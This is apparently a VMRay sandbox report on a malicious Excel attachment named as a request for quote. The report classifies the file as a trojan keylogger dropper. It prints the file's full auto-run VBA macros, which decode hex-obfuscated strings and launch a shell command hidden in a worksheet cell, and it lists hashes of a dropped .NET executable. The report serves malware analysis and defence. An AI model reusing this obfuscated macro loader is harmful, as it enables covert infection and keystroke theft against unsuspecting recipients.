Excel File Executes PowerShell to Download/Execute .Net Key Logger | Files
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Target: win7_64_sp1-mso2007 | ms_office
Classification: Trojan, Dropper, Keylogger, Downloader

49d9e68dbb6a4bfc5122545b2150adfc3b0ac99f717a1676a5de1e6865c8143b (SHA256)

share.cgissid07Ua3Tpfid07Ua3TpfilenameRFQ0332.xlsopenfolderforcedownloadep.xls

Excel Document

Created at 2018-04-18 14:33:00

...

Notifications (1/1)

The operating system was rebooted during the analysis because the sample installed a startup script or application for persistence.

Files Information

Number of sample files submitted for analysis 1
Number of files created and extracted during analysis 2
Number of files modified and extracted during analysis 0
c:\users\kft6utqw\desktop\share.cgissid07Ua3Tpfid07Ua3TpfilenameRFQ0332.xlsopenfolderforcedownloadep.xls
Blacklisted
»
File Properties
Names c:\users\kft6utqw\desktop\share.cgissid07Ua3Tpfid07Ua3TpfilenameRFQ0332.xlsopenfolderforcedownloadep.xls (Sample File)
Size 230.50 KB
Hash Values MD5: 16f7c7eef220983f255a9d4fce3d55bc
SHA1: 6004af991389c178f8c33f30fabd5d48bc2ce4c1
SHA256: 49d9e68dbb6a4bfc5122545b2150adfc3b0ac99f717a1676a5de1e6865c8143b
Actions
...
File Reputation Information
»
Information Value
Severity
Blacklisted
Names Unknown.Trojan.Agent
Families Agent
Classification Trojan
VBA Information
»
VBA Properties
Module Count 1
Macro Count 6
ThisWorkbook.cls - Activate Workbook
» 
Public Sub Auto_Open()
    Application.Run NPL_IO("5E5E67666875696F7C77616267757575")
End Sub
ThisWorkbook.cls - Eventless
» 
Option Explicit
Sub AAJIKXLR_ZDEJXXX()
    WO_S
End Sub
Public Function NPL_IO(ByVal text As String)
   Dim FZ_YBM As String
   Dim G_NDP As Long
   For G_NDP = 1 To Len(text) Step 2
        FZ_YBM = FZ_YBM & Chr(Asc(Chr("&H" & Mid(text, G_NDP, 2))) - 29)
   Next
   NPL_IO = FZ_YBM
End Function
Public Sub WO_S()
    Dim AO_RCV As Object: Set AO_RCV = VBA.CreateObject(NPL_IO("7470808F868D914B7085828989"))
    Dim WHX_B As String
WHX_B = "5C525C2E647F5C5C80855C36397D5C5C5C2E7E5C5C5C935C5C5C775C395C5C2C289B745C8C515C5C5F4851415C5C475C875E5C5C3337775C5C5C8F5C5C692A452A71565C4A355C3A645C5C6E5C8C5C5C555C63395C5C415C5C5C5C3B5C5C445C5C485C4D59455C525C5C2E665C205D335C8E5C2831803"
Dim DVZ_VG As String
DVZ_VG = "15C617A375C5C5C5C977262605C795C5C5C5C5C3A975C5C5C5C245C897D5C5C5C555C5C825C2C5C5C9C5C5C5C4C4031635C825C8D785D5C5C8236825C985C40205C1F5C222A5C5C5C815C2C6A8B5C4E5C945C5F5C6F77564220628F9A5C5C615C5C5C5C4A5C2C555C875C29784E5C785C5C5E5C5C6D5C"
Dim NG_EPT As String
NG_EPT = "5C5C7A1E5C4D9A395C5C915C5C5C214785666685746A5C5C775C5C685C625C6681612A8D5C5C5C945C5C5C915C5C8B5C755C765C5C865C5C935C44238D988E2C5C5C5C775C98965C5A5384925C5C5C5C5C7A9B26955C825C6E215C8D4D5F5C8273615C9B5C5C8A5C865C505C855C565C6E5C5C305C5C4"
Dim QM_M As String
QM_M = "4275C634D945C82295C5C2C5C875C535C5C5C5C43475C5C313C78848A5C5C3A9A5C5C5C5C39215C5C75753B5C372E2C405C5C79805C389B5C5C635C5C96585C6A9C5C4F425C5C5C46855C5C5C8C216674665C5C5C375C9243668A5C5C5C39905C42895C5C468D62505C1E655C5C5E85514D765C5C815C"
Dim KO_USI As String
KO_USI = "5C5C315C565C5C3C99665C878A3D8E5C5C3C5C49575C4A995C9C5C175C5C953E5C9578845C62305C5C505C5C5C5C2C5C275C61595C5C325C7E5C525C5C825C5C3C655C5C33635C5C5C8C84545C5C5C5C5C98595C457F9122652D5C835C895C5C63855C5C89875C5C715C5C5C459A5C325C5C2A5C74625"
Dim OA_SIR As String
OA_SIR = "C5E675C5C5C255C5C655C8F53285C2E5C5C5C5C933D5C4F5C5C357C5C5C5C3F4B5C3F5C5C5C685C5C63702887265C275C5B395C5C5C5C46545C89745C895C5C305C87838D5C5C5C5C4CD45C5C2B7F865C885C6D5C5C86445C5C6B945C9A5C73497A5C5C7C5C5C5C5C5C7A5C5C5C8A5C26555C345C5C5C"
Dim W_REJ As String
W_REJ = "8A245C265C91855C6C1D8E725C865C267D8F5C6F395C5C6E5C5C5C8B8A5C8D5C5C535C5C9481775C2D2A5C825C5C494E4B5C5C5C565C5C6A827E2A5C5C3A865C5C5C4F717D5C2A845C285C275C2F5C5C595B5C5C32843081526032745C5C5C623B5C5C5C5C5C5C5C74985C615F976B854C5C5C5C6B6A5"
Dim GY_USX As String
GY_USX = "C5C3C3A5C5C3E36655C3F4F5C5C7C8D644F5C5C3D5C5C5C5C8C5C308D765F5C4E475C5C5C5C778E5C7375395C798B5C5C5C7F635C4971285C755F225C5C91855C5C8B6D4A5C33415C8D5C495C5C5C5C954C5C995C785C38543589415C94996A515C5C3B5F5C5C4C5C5C5C7D5C5C5C7D5C5C848D5C5C2D805C525C955C1D5C5C4B5C5C5C8B5C7B5C5C1D94895C5C74294D5C2C295C655C6899295C755C5C5C5C4F5C5C5C874A635C2E5C5C2C5C525C61"

    AO_RCV.Run NPL_IO(ThisWorkbook.Sheets("XPNop").Range("J225").Value), 0, True
End Sub
ThisWorkbook.cls - Open Workbook
» 
Sub Workbook_Open()
    Application.Run "ThisWorkbook." & NPL_IO("5E5E67666875696F7C77616267757575")
End Sub
ThisWorkbook.cls - Open Document
» 
Public Sub Document_Open()
    Application.Run NPL_IO("5E5E67666875696F7C77616267757575")
End Sub
c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe
Blacklisted
»
File Properties
Names c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe (Created File)
Size 240.00 KB
Hash Values MD5: 8b70d9183b829c6c958b5ecabe95832f
SHA1: 6bdd34c6f0b0d5224899e47a615ce9d3c70c9f9d
SHA256: 8c77918a32167b1ccefb35c6f2a01803515ba6c055ff1d983c7b6c124b42ccd8
Actions
...
File Reputation Information
»
Information Value
Severity
Blacklisted
Names Win32.Trojan.2
Families 2
Classification Trojan
PE Information
»
Information Value
Image Base 0x400000
Entry Point 0x4380ce
Size Of Code 0x37000
Size Of Initialized Data 0x4000
Size Of Uninitialized Data 0x0
Format x86
Type Executable
Subsystem IMAGE_SUBSYSTEM_WINDOWS_GUI
Machine Type IMAGE_FILE_MACHINE_I386
Compile Timestamp 2018-04-16 12:23:12
Compiler/Packer Unknown
Sections (3)
»
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x402000 0x360d4 0x37000 0x1000 CNT_CODE, MEM_EXECUTE, MEM_READ 6.98
.rsrc 0x43a000 0x2900 0x3000 0x38000 CNT_INITIALIZED_DATA, MEM_READ 6.12
.reloc 0x43e000 0xc 0x1000 0x3b000 CNT_INITIALIZED_DATA, MEM_DISCARDABLE, MEM_READ 0.02
Imports (1)
»
mscoree.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset
_CorExeMain 0x0 0x402000 0x380a8 0x370a8
Icons (1)
»
c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe
»
File Properties
Names c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe (Created File)
Size 0.00 KB
Hash Values MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image